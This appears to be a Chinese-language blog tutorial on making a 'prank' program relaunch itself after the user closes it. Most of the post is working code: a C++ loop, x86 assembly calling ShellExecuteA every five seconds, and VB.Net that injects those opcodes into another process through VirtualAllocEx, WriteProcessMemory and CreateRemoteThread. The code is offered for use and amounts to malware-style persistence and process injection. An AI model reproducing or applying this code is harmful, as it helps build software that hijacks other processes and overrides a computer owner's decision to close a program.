close
HI,
有時候你可能會需要寫些惡作劇的程式,但是被關閉就會不存在了除非使用者再次開啟.
那麼有個概念是,就算被關閉後使用者不開啟,讓其它的進程會自動把惡作劇程式再次開啟呢?
那麼我們就得用到ShellExecute這個API來達成開啟這個行為了,
那麼我們要做的事情有什麼?
我們可能會需要一個迴圈來間隔一段時間便呼叫一次惡作劇程式,以C++上來說大概是如此的:
[C++]
while (true){
Sleep(看你是需要間隔多久一次);
ShellExecute(0,"open","你的程式路徑",NULL,NULL,SW_SHOW);
}
不過我們既然是要插入到別的Process做監控,當然便無法用純C++寫了
那麼我們組合語言上該怎麼寫呢?該寫作如此:
[Asm]
MyThread:
push 0x1388//假如我每五秒呼叫一次惡作劇程式
call Sleep
push 0x05//SW_SHOW
push 0x00//要操作目錄我們不需要,寫零
push 0x00//參數?我們不需要,填零
push 地址A//這是你的程式路徑存放點
push 地址B//這是你的"Open"字串存放點
push 0x00//父視窗Handle,讓給桌面吧 我們不需要,寫零
call ShellExecuteA
jmp MyThread//跳回起始點無限循環休息、開啟程式
OK,寫到這裡,你寫到任何一個Process身上看到的結果應該會是:
那麼再來我們在VB.Net內想把這段Code注入到別人身上怎麼做,可以如此:
[VB.Net]
Dim GetSleepAdr As IntPtr = GetProcAddress(GetModuleHandle("kernel32.dll"), "Sleep")
//取得Sleep函數位置
Dim GetShellAdr As IntPtr = GetProcAddress(GetModuleHandle("shell32.dll"), "ShellExecuteA")
//取得ShellExecuteA位置
Dim hProc As IntPtr = P.Handle
//指定一個要受注入的Process
Dim ShellOperaCode = VirtualAllocEx(hProc, 0&, &H64, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
//申請一塊記憶體擺放"Open"字串
Dim GetPathAllocAdr = VirtualAllocEx(hProc, 0&, &HFF, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
//申請一塊記憶體擺放程式路徑
Dim ThreadAllocMem = VirtualAllocEx(hProc, 0&, &HFF, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
//申請存放上面整個迴圈過程的空間
Dim PathChar As Byte() = System.Text.Encoding.Default.GetBytes(ShellPath.ToCharArray)
//先把當前路徑轉成Char陣列
Dim OperaChar As Byte() = System.Text.Encoding.Default.GetBytes("open"
)//把"Open"轉為Char陣列
WriteProcessMemory(hProc, ShellOperaCode, OperaChar, OperaChar.Length, 0)
//把"Open"存放入申請的空間
WriteProcessMemory(hProc, GetPathAllocAdr, PathChar, PathChar.Length, 0)
//把路徑存放入申請的空間
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 0, {&H68}, 1, 0)
//Push
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 1, System.BitConverter.GetBytes(BlockWaitTime), 4, 0)
//休息時間
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 5, {&HE8}, 1, 0)
//Call
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 6, System.BitConverter.GetBytes(GetSleepAdr.ToInt32 - ThreadAllocMem.ToInt32 - 10), 4, 0)//Sleep地址
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 10, {&H6A, &H5, &H6A, &H0, &H6A, &H0, &H68}, 7, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 17, System.BitConverter.GetBytes(GetPathAllocAdr.ToInt32), 4, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 21, {&H68}, 1, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 22, System.BitConverter.GetBytes(ShellOperaCode.ToInt32), 4, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 26, {&H6A, &H0, &HE8}, 3, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 29, System.BitConverter.GetBytes(GetShellAdr.ToInt32 - ThreadAllocMem.ToInt32 - &H21), 4, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 33, {&H68}, 1, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 34, System.BitConverter.GetBytes(ThreadAllocMem.ToInt32), 4, 0)
WriteProcessMemory(hProc, ThreadAllocMem.ToInt32 + 38, {&HC3}, 1, 0)
CreateRemoteThread(hProc, 0, 0, ThreadAllocMem.ToInt32, 0, 0, 0)
//讓整段迴圈有線程去執行
全站熱搜
留言列表
楓之谷數據 (1)
